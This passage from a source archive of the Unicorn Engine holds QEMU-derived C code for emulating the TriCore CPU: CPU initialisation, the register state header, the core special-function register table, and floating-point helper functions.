the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "cpu-qom.h" #include "exec/exec-all.h" #include <uc_priv.h> static inline void set_feature(CPUTriCoreState *env, int feature) { env->features |= 1ULL << feature; } static void tricore_cpu_set_pc(CPUState *cs, vaddr value) { TriCoreCPU *cpu = TRICORE_CPU(cs); CPUTriCoreState *env = &cpu->env; env->PC = value & ~(target_ulong)1; } static void tricore_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { TriCoreCPU *cpu = TRICORE_CPU(cs); CPUTriCoreState *env = &cpu->env; env->PC = tb->pc; } static void tricore_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); TriCoreCPU *cpu = TRICORE_CPU(s); TriCoreCPUClass *tcc = TRICORE_CPU_GET_CLASS(cpu); CPUTriCoreState *env = &cpu->env; tcc->parent_reset(dev); memset(env, 0, offsetof(CPUTriCoreState, end_reset_fields)); cpu_state_reset(env); } static bool tricore_cpu_has_work(CPUState *cs) { return true; } static void tricore_cpu_realizefn(CPUState *dev) { CPUState *cs = CPU(dev); TriCoreCPU *cpu = TRICORE_CPU(dev); CPUTriCoreState *env = &cpu->env; cpu_exec_realizefn(cs); /* Some features automatically imply others */ if (tricore_feature(env, TRICORE_FEATURE_161)) { set_feature(env, TRICORE_FEATURE_16); } if (tricore_feature(env, TRICORE_FEATURE_16)) { set_feature(env, TRICORE_FEATURE_131); } if (tricore_feature(env, TRICORE_FEATURE_131)) { set_feature(env, TRICORE_FEATURE_13); } cpu_reset(cs); } static void tricore_cpu_initfn(struct uc_struct *uc, CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); CPUTriCoreState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void tc1796_initfn(CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); set_feature(&cpu->env, TRICORE_FEATURE_13); } static void tc1797_initfn(CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); set_feature(&cpu->env, TRICORE_FEATURE_131); } static void tc27x_initfn(CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); set_feature(&cpu->env, TRICORE_FEATURE_161); } static void tricore_cpu_class_init(CPUClass *c) { TriCoreCPUClass *mcc = TRICORE_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ mcc->parent_reset = cc->reset; cc->reset = tricore_cpu_reset; cc->has_work = tricore_cpu_has_work; cc->set_pc = tricore_cpu_set_pc; cc->synchronize_from_tb = tricore_cpu_synchronize_from_tb; cc->get_phys_page_debug = tricore_cpu_get_phys_page_debug; cc->tlb_fill_cpu = tricore_cpu_tlb_fill; cc->tcg_initialize = tricore_tcg_init; } #define DEFINE_TRICORE_CPU_TYPE(cpu_model, initfn) \ { \ .parent = TYPE_TRICORE_CPU, \ .initfn = initfn, \ .name = TRICORE_CPU_TYPE_NAME(cpu_model), \ } struct TriCoreCPUInfo { const char *name; void (*initfn)(CPUState *obj); }; static struct TriCoreCPUInfo tricore_cpus_type_infos[] = { { "tc1796", tc1796_initfn }, { "tc1797", tc1797_initfn }, { "tc27x", tc27x_initfn }, }; TriCoreCPU *cpu_tricore_init(struct uc_struct *uc) { TriCoreCPU *cpu; CPUState *cs; CPUClass *cc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = 2; // tc27x } else if (uc->cpu_model >= ARRAY_SIZE(tricore_cpus_type_infos)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; cpu_class_init(uc, cc); tricore_cpu_class_init(cc); cpu_common_initfn(uc, cs); tricore_cpu_initfn(uc, cs); tricore_cpus_type_infos[uc->cpu_model].initfn(cs); tricore_cpu_realizefn(cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; } �����������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/cpu.h�������������������������������������������������������������0000664�0000000�0000000�00000022340�14675241067�0020051�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore emulation for qemu: main CPU struct. * * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #ifndef TRICORE_CPU_H #define TRICORE_CPU_H #include "cpu-qom.h" #include "exec/cpu-defs.h" #include "tricore-defs.h" struct tricore_boot_info; typedef struct tricore_def_t tricore_def_t; // struct CPUTriCoreState { typedef struct CPUTriCoreState { /* GPR Register */ uint32_t gpr_a[16]; uint32_t gpr_d[16]; /* CSFR Register */ uint32_t PCXI; /* Frequently accessed PSW_USB bits are stored separately for efficiency. This contains all the other bits. Use psw_{read,write} to access the whole PSW. */ uint32_t PSW; /* PSW flag cache for faster execution */ uint32_t PSW_USB_C; uint32_t PSW_USB_V; /* Only if bit 31 set, then flag is set */ uint32_t PSW_USB_SV; /* Only if bit 31 set, then flag is set */ uint32_t PSW_USB_AV; /* Only if bit 31 set, then flag is set. */ uint32_t PSW_USB_SAV; /* Only if bit 31 set, then flag is set. */ uint32_t PC; uint32_t SYSCON; uint32_t CPU_ID; uint32_t CORE_ID; uint32_t BIV; uint32_t BTV; uint32_t ISP; uint32_t ICR; uint32_t FCX; uint32_t LCX; uint32_t COMPAT; /* Mem Protection Register */ uint32_t DPR0_0L; uint32_t DPR0_0U; uint32_t DPR0_1L; uint32_t DPR0_1U; uint32_t DPR0_2L; uint32_t DPR0_2U; uint32_t DPR0_3L; uint32_t DPR0_3U; uint32_t DPR1_0L; uint32_t DPR1_0U; uint32_t DPR1_1L; uint32_t DPR1_1U; uint32_t DPR1_2L; uint32_t DPR1_2U; uint32_t DPR1_3L; uint32_t DPR1_3U; uint32_t DPR2_0L; uint32_t DPR2_0U; uint32_t DPR2_1L; uint32_t DPR2_1U; uint32_t DPR2_2L; uint32_t DPR2_2U; uint32_t DPR2_3L; uint32_t DPR2_3U; uint32_t DPR3_0L; uint32_t DPR3_0U; uint32_t DPR3_1L; uint32_t DPR3_1U; uint32_t DPR3_2L; uint32_t DPR3_2U; uint32_t DPR3_3L; uint32_t DPR3_3U; uint32_t CPR0_0L; uint32_t CPR0_0U; uint32_t CPR0_1L; uint32_t CPR0_1U; uint32_t CPR0_2L; uint32_t CPR0_2U; uint32_t CPR0_3L; uint32_t CPR0_3U; uint32_t CPR1_0L; uint32_t CPR1_0U; uint32_t CPR1_1L; uint32_t CPR1_1U; uint32_t CPR1_2L; uint32_t CPR1_2U; uint32_t CPR1_3L; uint32_t CPR1_3U; uint32_t CPR2_0L; uint32_t CPR2_0U; uint32_t CPR2_1L; uint32_t CPR2_1U; uint32_t CPR2_2L; uint32_t CPR2_2U; uint32_t CPR2_3L; uint32_t CPR2_3U; uint32_t CPR3_0L; uint32_t CPR3_0U; uint32_t CPR3_1L; uint32_t CPR3_1U; uint32_t CPR3_2L; uint32_t CPR3_2U; uint32_t CPR3_3L; uint32_t CPR3_3U; uint32_t DPM0; uint32_t DPM1; uint32_t DPM2; uint32_t DPM3; uint32_t CPM0; uint32_t CPM1; uint32_t CPM2; uint32_t CPM3; /* Memory Management Registers */ uint32_t MMU_CON; uint32_t MMU_ASI; uint32_t MMU_TVA; uint32_t MMU_TPA; uint32_t MMU_TPX; uint32_t MMU_TFA; /* {1.3.1 only */ uint32_t BMACON; uint32_t SMACON; uint32_t DIEAR; uint32_t DIETR; uint32_t CCDIER; uint32_t MIECON; uint32_t PIEAR; uint32_t PIETR; uint32_t CCPIER; /*} */ /* Debug Registers */ uint32_t DBGSR; uint32_t EXEVT; uint32_t CREVT; uint32_t SWEVT; uint32_t TR0EVT; uint32_t TR1EVT; uint32_t DMS; uint32_t DCX; uint32_t DBGTCR; uint32_t CCTRL; uint32_t CCNT; uint32_t ICNT; uint32_t M1CNT; uint32_t M2CNT; uint32_t M3CNT; /* Floating Point Registers */ float_status fp_status; /* QEMU */ int error_code; uint32_t hflags; /* CPU State */ const tricore_def_t *cpu_model; void *irq[8]; struct QEMUTimer *timer; /* Internal timer */ /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; /* Fields from here on are preserved across CPU reset. */ uint32_t features; // Unicorn engine struct uc_struct *uc; } CPUTriCoreState; /** * TriCoreCPU: * @env: #CPUTriCoreState * * A TriCore CPU. */ // TODO: Why is the type def needed? Without it the later typedef fails to find this... ? typedef struct TriCoreCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUTriCoreState env; struct TriCoreCPUClass cc; } TriCoreCPU; hwaddr tricore_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void tricore_cpu_dump_state(CPUState *cpu, FILE *f, int flags); #define MASK_PCXI_PCPN 0xff000000 #define MASK_PCXI_PIE_1_3 0x00800000 #define MASK_PCXI_PIE_1_6 0x00200000 #define MASK_PCXI_UL 0x00400000 #define MASK_PCXI_PCXS 0x000f0000 #define MASK_PCXI_PCXO 0x0000ffff #define MASK_PSW_USB 0xff000000 #define MASK_USB_C 0x80000000 #define MASK_USB_V 0x40000000 #define MASK_USB_SV 0x20000000 #define MASK_USB_AV 0x10000000 #define MASK_USB_SAV 0x08000000 #define MASK_PSW_PRS 0x00003000 #define MASK_PSW_IO 0x00000c00 #define MASK_PSW_IS 0x00000200 #define MASK_PSW_GW 0x00000100 #define MASK_PSW_CDE 0x00000080 #define MASK_PSW_CDC 0x0000007f #define MASK_PSW_FPU_RM 0x3000000 #define MASK_SYSCON_PRO_TEN 0x2 #define MASK_SYSCON_FCD_SF 0x1 #define MASK_CPUID_MOD 0xffff0000 #define MASK_CPUID_MOD_32B 0x0000ff00 #define MASK_CPUID_REV 0x000000ff #define MASK_ICR_PIPN 0x00ff0000 #define MASK_ICR_IE_1_3 0x00000100 #define MASK_ICR_IE_1_6 0x00008000 #define MASK_ICR_CCPN 0x000000ff #define MASK_FCX_FCXS 0x000f0000 #define MASK_FCX_FCXO 0x0000ffff #define MASK_LCX_LCXS 0x000f0000 #define MASK_LCX_LCX0 0x0000ffff #define MASK_DBGSR_DE 0x1 #define MASK_DBGSR_HALT 0x6 #define MASK_DBGSR_SUSP 0x10 #define MASK_DBGSR_PREVSUSP 0x20 #define MASK_DBGSR_PEVT 0x40 #define MASK_DBGSR_EVTSRC 0x1f00 #define TRICORE_HFLAG_KUU 0x3 #define TRICORE_HFLAG_UM0 0x00002 /* user mode-0 flag */ #define TRICORE_HFLAG_UM1 0x00001 /* user mode-1 flag */ #define TRICORE_HFLAG_SM 0x00000 /* kernel mode flag */ enum tricore_features { TRICORE_FEATURE_13, TRICORE_FEATURE_131, TRICORE_FEATURE_16, TRICORE_FEATURE_161, }; static inline int tricore_feature(CPUTriCoreState *env, int feature) { return (env->features & (1ULL << feature)) != 0; } /* TriCore Traps Classes*/ enum { TRAPC_NONE = -1, TRAPC_MMU = 0, TRAPC_PROT = 1, TRAPC_INSN_ERR = 2, TRAPC_CTX_MNG = 3, TRAPC_SYSBUS = 4, TRAPC_ASSERT = 5, TRAPC_SYSCALL = 6, TRAPC_NMI = 7, TRAPC_IRQ = 8 }; /* Class 0 TIN */ enum { TIN0_VAF = 0, TIN0_VAP = 1, }; /* Class 1 TIN */ enum { TIN1_PRIV = 1, TIN1_MPR = 2, TIN1_MPW = 3, TIN1_MPX = 4, TIN1_MPP = 5, TIN1_MPN = 6, TIN1_GRWP = 7, }; /* Class 2 TIN */ enum { TIN2_IOPC = 1, TIN2_UOPC = 2, TIN2_OPD = 3, TIN2_ALN = 4, TIN2_MEM = 5, }; /* Class 3 TIN */ enum { TIN3_FCD = 1, TIN3_CDO = 2, TIN3_CDU = 3, TIN3_FCU = 4, TIN3_CSU = 5, TIN3_CTYP = 6, TIN3_NEST = 7, }; /* Class 4 TIN */ enum { TIN4_PSE = 1, TIN4_DSE = 2, TIN4_DAE = 3, TIN4_CAE = 4, TIN4_PIE = 5, TIN4_DIE = 6, }; /* Class 5 TIN */ enum { TIN5_OVF = 1, TIN5_SOVF = 1, }; /* Class 6 TIN * * Is always TIN6_SYS */ /* Class 7 TIN */ enum { TIN7_NMI = 0, }; uint32_t psw_read(CPUTriCoreState *env); void psw_write(CPUTriCoreState *env, uint32_t val); int tricore_cpu_gdb_read_register(CPUState *cs, GByteArray *mem_buf, int n); int tricore_cpu_gdb_write_register(CPUState *cs, uint8_t *mem_buf, int n); void fpu_set_state(CPUTriCoreState *env); #define MMU_USER_IDX 2 void tricore_cpu_list(void); #define cpu_list tricore_cpu_list static inline int cpu_mmu_index(CPUTriCoreState *env, bool ifetch) { return 0; } typedef CPUTriCoreState CPUArchState; typedef TriCoreCPU ArchCPU; #include "exec/cpu-all.h" void cpu_state_reset(CPUTriCoreState *s); void tricore_tcg_init(struct uc_struct *uc); static inline void cpu_get_tb_cpu_state(CPUTriCoreState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->PC; *cs_base = 0; *flags = 0; } #define TRICORE_CPU_TYPE_SUFFIX "-" TYPE_TRICORE_CPU #define TRICORE_CPU_TYPE_NAME(model) model TRICORE_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_TRICORE_CPU /* helpers.c */ bool tricore_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); #endif /* TRICORE_CPU_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/csfr.def����������������������������������������������������������0000664�0000000�0000000�00000011043�14675241067�0020524�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* A(ll) access permited R(ead only) access E(nd init protected) access A|R|E(offset, register, feature introducing reg) NOTE: PSW is handled as a special case in gen_mtcr/mfcr */ A(0xfe00, PCXI, TRICORE_FEATURE_13) A(0xfe08, PC, TRICORE_FEATURE_13) A(0xfe14, SYSCON, TRICORE_FEATURE_13) R(0xfe18, CPU_ID, TRICORE_FEATURE_13) R(0xfe1c, CORE_ID, TRICORE_FEATURE_161) E(0xfe20, BIV, TRICORE_FEATURE_13) E(0xfe24, BTV, TRICORE_FEATURE_13) E(0xfe28, ISP, TRICORE_FEATURE_13) A(0xfe2c, ICR, TRICORE_FEATURE_13) A(0xfe38, FCX, TRICORE_FEATURE_13) A(0xfe3c, LCX, TRICORE_FEATURE_13) E(0x9400, COMPAT, TRICORE_FEATURE_131) /* memory protection register */ A(0xC000, DPR0_0L, TRICORE_FEATURE_13) A(0xC004, DPR0_0U, TRICORE_FEATURE_13) A(0xC008, DPR0_1L, TRICORE_FEATURE_13) A(0xC00C, DPR0_1U, TRICORE_FEATURE_13) A(0xC010, DPR0_2L, TRICORE_FEATURE_13) A(0xC014, DPR0_2U, TRICORE_FEATURE_13) A(0xC018, DPR0_3L, TRICORE_FEATURE_13) A(0xC01C, DPR0_3U, TRICORE_FEATURE_13) A(0xC400, DPR1_0L, TRICORE_FEATURE_13) A(0xC404, DPR1_0U, TRICORE_FEATURE_13) A(0xC408, DPR1_1L, TRICORE_FEATURE_13) A(0xC40C, DPR1_1U, TRICORE_FEATURE_13) A(0xC410, DPR1_2L, TRICORE_FEATURE_13) A(0xC414, DPR1_2U, TRICORE_FEATURE_13) A(0xC418, DPR1_3L, TRICORE_FEATURE_13) A(0xC41C, DPR1_3U, TRICORE_FEATURE_13) A(0xC800, DPR2_0L, TRICORE_FEATURE_13) A(0xC804, DPR2_0U, TRICORE_FEATURE_13) A(0xC808, DPR2_1L, TRICORE_FEATURE_13) A(0xC80C, DPR2_1U, TRICORE_FEATURE_13) A(0xC810, DPR2_2L, TRICORE_FEATURE_13) A(0xC814, DPR2_2U, TRICORE_FEATURE_13) A(0xC818, DPR2_3L, TRICORE_FEATURE_13) A(0xC81C, DPR2_3U, TRICORE_FEATURE_13) A(0xCC00, DPR3_0L, TRICORE_FEATURE_13) A(0xCC04, DPR3_0U, TRICORE_FEATURE_13) A(0xCC08, DPR3_1L, TRICORE_FEATURE_13) A(0xCC0C, DPR3_1U, TRICORE_FEATURE_13) A(0xCC10, DPR3_2L, TRICORE_FEATURE_13) A(0xCC14, DPR3_2U, TRICORE_FEATURE_13) A(0xCC18, DPR3_3L, TRICORE_FEATURE_13) A(0xCC1C, DPR3_3U, TRICORE_FEATURE_13) A(0xD000, CPR0_0L, TRICORE_FEATURE_13) A(0xD004, CPR0_0U, TRICORE_FEATURE_13) A(0xD008, CPR0_1L, TRICORE_FEATURE_13) A(0xD00C, CPR0_1U, TRICORE_FEATURE_13) A(0xD010, CPR0_2L, TRICORE_FEATURE_13) A(0xD014, CPR0_2U, TRICORE_FEATURE_13) A(0xD018, CPR0_3L, TRICORE_FEATURE_13) A(0xD01C, CPR0_3U, TRICORE_FEATURE_13) A(0xD400, CPR1_0L, TRICORE_FEATURE_13) A(0xD404, CPR1_0U, TRICORE_FEATURE_13) A(0xD408, CPR1_1L, TRICORE_FEATURE_13) A(0xD40C, CPR1_1U, TRICORE_FEATURE_13) A(0xD410, CPR1_2L, TRICORE_FEATURE_13) A(0xD414, CPR1_2U, TRICORE_FEATURE_13) A(0xD418, CPR1_3L, TRICORE_FEATURE_13) A(0xD41C, CPR1_3U, TRICORE_FEATURE_13) A(0xD800, CPR2_0L, TRICORE_FEATURE_13) A(0xD804, CPR2_0U, TRICORE_FEATURE_13) A(0xD808, CPR2_1L, TRICORE_FEATURE_13) A(0xD80C, CPR2_1U, TRICORE_FEATURE_13) A(0xD810, CPR2_2L, TRICORE_FEATURE_13) A(0xD814, CPR2_2U, TRICORE_FEATURE_13) A(0xD818, CPR2_3L, TRICORE_FEATURE_13) A(0xD81C, CPR2_3U, TRICORE_FEATURE_13) A(0xDC00, CPR3_0L, TRICORE_FEATURE_13) A(0xDC04, CPR3_0U, TRICORE_FEATURE_13) A(0xDC08, CPR3_1L, TRICORE_FEATURE_13) A(0xDC0C, CPR3_1U, TRICORE_FEATURE_13) A(0xDC10, CPR3_2L, TRICORE_FEATURE_13) A(0xDC14, CPR3_2U, TRICORE_FEATURE_13) A(0xDC18, CPR3_3L, TRICORE_FEATURE_13) A(0xDC1C, CPR3_3U, TRICORE_FEATURE_13) A(0xE000, DPM0, TRICORE_FEATURE_13) A(0xE080, DPM1, TRICORE_FEATURE_13) A(0xE100, DPM2, TRICORE_FEATURE_13) A(0xE180, DPM3, TRICORE_FEATURE_13) A(0xE200, CPM0, TRICORE_FEATURE_13) A(0xE280, CPM1, TRICORE_FEATURE_13) A(0xE300, CPM2, TRICORE_FEATURE_13) A(0xE380, CPM3, TRICORE_FEATURE_13) /* memory management registers */ A(0x8000, MMU_CON, TRICORE_FEATURE_13) A(0x8004, MMU_ASI, TRICORE_FEATURE_13) A(0x800C, MMU_TVA, TRICORE_FEATURE_13) A(0x8010, MMU_TPA, TRICORE_FEATURE_13) A(0x8014, MMU_TPX, TRICORE_FEATURE_13) A(0x8018, MMU_TFA, TRICORE_FEATURE_13) E(0x9004, BMACON, TRICORE_FEATURE_131) E(0x900C, SMACON, TRICORE_FEATURE_131) A(0x9020, DIEAR, TRICORE_FEATURE_131) A(0x9024, DIETR, TRICORE_FEATURE_131) A(0x9028, CCDIER, TRICORE_FEATURE_131) E(0x9044, MIECON, TRICORE_FEATURE_131) A(0x9210, PIEAR, TRICORE_FEATURE_131) A(0x9214, PIETR, TRICORE_FEATURE_131) A(0x9218, CCPIER, TRICORE_FEATURE_131) /* debug registers */ A(0xFD00, DBGSR, TRICORE_FEATURE_13) A(0xFD08, EXEVT, TRICORE_FEATURE_13) A(0xFD0C, CREVT, TRICORE_FEATURE_13) A(0xFD10, SWEVT, TRICORE_FEATURE_13) A(0xFD20, TR0EVT, TRICORE_FEATURE_13) A(0xFD24, TR1EVT, TRICORE_FEATURE_13) A(0xFD40, DMS, TRICORE_FEATURE_13) A(0xFD44, DCX, TRICORE_FEATURE_13) A(0xFD48, DBGTCR, TRICORE_FEATURE_131) A(0xFC00, CCTRL, TRICORE_FEATURE_131) A(0xFC04, CCNT, TRICORE_FEATURE_131) A(0xFC08, ICNT, TRICORE_FEATURE_131) A(0xFC0C, M1CNT, TRICORE_FEATURE_131) A(0xFC10, M2CNT, TRICORE_FEATURE_131) A(0xFC14, M3CNT, TRICORE_FEATURE_131) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/fpu_helper.c������������������������������������������������������0000664�0000000�0000000�00000034657�14675241067�0021424�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore emulation for qemu: fpu helper. * * Copyright (c) 2016 Bastian Koppelmann University of Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/host-utils.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define QUIET_NAN 0x7fc00000 #define ADD_NAN 0x7fc00001 #define SQRT_NAN 0x7fc00004 #define DIV_NAN 0x7fc00008 #define MUL_NAN 0x7fc00002 #define FPU_FS PSW_USB_C #define FPU_FI PSW_USB_V #define FPU_FV PSW_USB_SV #define FPU_FZ PSW_USB_AV #define FPU_FU PSW_USB_SAV #define float32_sqrt_nan make_float32(SQRT_NAN) #define float32_quiet_nan make_float32(QUIET_NAN) /* we don't care about input_denormal */ static inline uint8_t f_get_excp_flags(CPUTriCoreState *env) { return get_float_exception_flags(&env->fp_status) & (float_flag_invalid | float_flag_overflow | float_flag_underflow | float_flag_output_denormal | float_flag_divbyzero | float_flag_inexact); } static inline float32 f_maddsub_nan_result(float32 arg1, float32 arg2, float32 arg3, float32 result, uint32_t muladd_negate_c) { uint32_t aSign, bSign, cSign; uint32_t aExp, bExp, cExp; if (float32_is_any_nan(arg1) || float32_is_any_nan(arg2) || float32_is_any_nan(arg3)) { return QUIET_NAN; } else if (float32_is_infinity(arg1) && float32_is_zero(arg2)) { return MUL_NAN; } else if (float32_is_zero(arg1) && float32_is_infinity(arg2)) { return MUL_NAN; } else { aSign = arg1 >> 31; bSign = arg2 >> 31; cSign = arg3 >> 31; aExp = (arg1 >> 23) & 0xff; bExp = (arg2 >> 23) & 0xff; cExp = (arg3 >> 23) & 0xff; if (muladd_negate_c) { cSign ^= 1; } if (((aExp == 0xff) || (bExp == 0xff)) && (cExp == 0xff)) { if (aSign ^ bSign ^ cSign) { return ADD_NAN; } } } return result; } static void f_update_psw_flags(CPUTriCoreState *env, uint8_t flags) { uint8_t some_excp = 0; set_float_exception_flags(0, &env->fp_status); if (flags & float_flag_invalid) { env->FPU_FI = 1 << 31; some_excp = 1; } if (flags & float_flag_overflow) { env->FPU_FV = 1 << 31; some_excp = 1; } if (flags & float_flag_underflow || flags & float_flag_output_denormal) { env->FPU_FU = 1 << 31; some_excp = 1; } if (flags & float_flag_divbyzero) { env->FPU_FZ = 1 << 31; some_excp = 1; } if (flags & float_flag_inexact || flags & float_flag_output_denormal) { env->PSW |= 1 << 26; some_excp = 1; } env->FPU_FS = some_excp; } #define FADD_SUB(op) \ uint32_t helper_f##op(CPUTriCoreState *env, uint32_t r1, uint32_t r2) \ { \ float32 arg1 = make_float32(r1); \ float32 arg2 = make_float32(r2); \ uint32_t flags; \ float32 f_result; \ \ f_result = float32_##op(arg2, arg1, &env->fp_status); \ flags = f_get_excp_flags(env); \ if (flags) { \ /* If the output is a NaN, but the inputs aren't, \ we return a unique value. */ \ if ((flags & float_flag_invalid) \ && !float32_is_any_nan(arg1) \ && !float32_is_any_nan(arg2)) { \ f_result = ADD_NAN; \ } \ f_update_psw_flags(env, flags); \ } else { \ env->FPU_FS = 0; \ } \ return (uint32_t)f_result; \ } FADD_SUB(add) FADD_SUB(sub) uint32_t helper_fmul(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 f_result; f_result = float32_mul(arg1, arg2, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { /* If the output is a NaN, but the inputs aren't, we return a unique value. */ if ((flags & float_flag_invalid) && !float32_is_any_nan(arg1) && !float32_is_any_nan(arg2)) { f_result = MUL_NAN; } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } /* * Target TriCore QSEED.F significand Lookup Table * * The QSEED.F output significand depends on the least-significant * exponent bit and the 6 most-significant significand bits. * * IEEE 754 float datatype * partitioned into Sign (S), Exponent (E) and Significand (M): * * S E E E E E E E E M M M M M M ... * | | | * +------+------+-------+-------+ * | | * for lookup table * calculating index for * output E output M * * This lookup table was extracted by analyzing QSEED output * from the real hardware */ static const uint8_t target_qseed_significand_table[128] = { 253, 252, 245, 244, 239, 238, 231, 230, 225, 224, 217, 216, 211, 210, 205, 204, 201, 200, 195, 194, 189, 188, 185, 184, 179, 178, 175, 174, 169, 168, 165, 164, 161, 160, 157, 156, 153, 152, 149, 148, 145, 144, 141, 140, 137, 136, 133, 132, 131, 130, 127, 126, 123, 122, 121, 120, 117, 116, 115, 114, 111, 110, 109, 108, 103, 102, 99, 98, 93, 92, 89, 88, 83, 82, 79, 78, 75, 74, 71, 70, 67, 66, 63, 62, 59, 58, 55, 54, 53, 52, 49, 48, 45, 44, 43, 42, 39, 38, 37, 36, 33, 32, 31, 30, 27, 26, 25, 24, 23, 22, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2 }; uint32_t helper_qseed(CPUTriCoreState *env, uint32_t r1) { uint32_t arg1, S, E, M, E_minus_one, m_idx; uint32_t new_E, new_M, new_S, result; arg1 = make_float32(r1); /* fetch IEEE-754 fields S, E and the uppermost 6-bit of M */ S = extract32(arg1, 31, 1); E = extract32(arg1, 23, 8); M = extract32(arg1, 17, 6); if (float32_is_any_nan(arg1)) { result = float32_quiet_nan; } else if (float32_is_zero_or_denormal(arg1)) { if (float32_is_neg(arg1)) { result = float32_infinity | (1 << 31); } else { result = float32_infinity; } } else if (float32_is_neg(arg1)) { result = float32_sqrt_nan; } else if (float32_is_infinity(arg1)) { result = float32_zero; } else { E_minus_one = E - 1; m_idx = ((E_minus_one & 1) << 6) | M; new_S = S; new_E = 0xBD - E_minus_one / 2; new_M = target_qseed_significand_table[m_idx]; result = 0; result = deposit32(result, 31, 1, new_S); result = deposit32(result, 23, 8, new_E); result = deposit32(result, 15, 8, new_M); } if (float32_is_signaling_nan(arg1, &env->fp_status) || result == float32_sqrt_nan) { env->FPU_FI = 1 << 31; env->FPU_FS = 1; } else { env->FPU_FS = 0; } return (uint32_t) result; } uint32_t helper_fdiv(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 f_result; f_result = float32_div(arg1, arg2 , &env->fp_status); flags = f_get_excp_flags(env); if (flags) { /* If the output is a NaN, but the inputs aren't, we return a unique value. */ if ((flags & float_flag_invalid) && !float32_is_any_nan(arg1) && !float32_is_any_nan(arg2)) { f_result = DIV_NAN; } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_fmadd(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 arg3 = make_float32(r3); float32 f_result; f_result = float32_muladd(arg1, arg2, arg3, 0, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { if (flags & float_flag_invalid) { arg1 = float32_squash_input_denormal(arg1, &env->fp_status); arg2 = float32_squash_input_denormal(arg2, &env->fp_status); arg3 = float32_squash_input_denormal(arg3, &env->fp_status); f_result = f_maddsub_nan_result(arg1, arg2, arg3, f_result, 0); } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } 